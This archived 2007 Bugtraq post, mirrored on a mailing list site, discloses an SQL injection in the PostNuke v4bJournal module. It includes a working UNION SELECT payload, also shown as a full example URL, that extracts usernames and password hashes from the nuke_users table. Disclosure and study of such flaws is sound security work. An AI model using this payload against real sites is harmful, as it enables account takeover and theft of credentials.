| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070502175934.31417.qmail@securityfocus.com>
Date: 2 May 2007 17:59:34 -0000
From: abbasi@...mb.ac.ir
To: bugtraq@...urityfocus.com
Subject: Post Nuke v4bJournal Module Sql Inject
----------------------------------------
PostNuke Journal
----------------------------------------
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: abbasi@...mb.ac.ir
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
------------------------------------------
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: ABDUCTER_MINDS@...OO.COM
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
U must regrister first ( You Most Have An Account On Vulnerable Site )
-------------------------------------------
Powered by blists - more mailing lists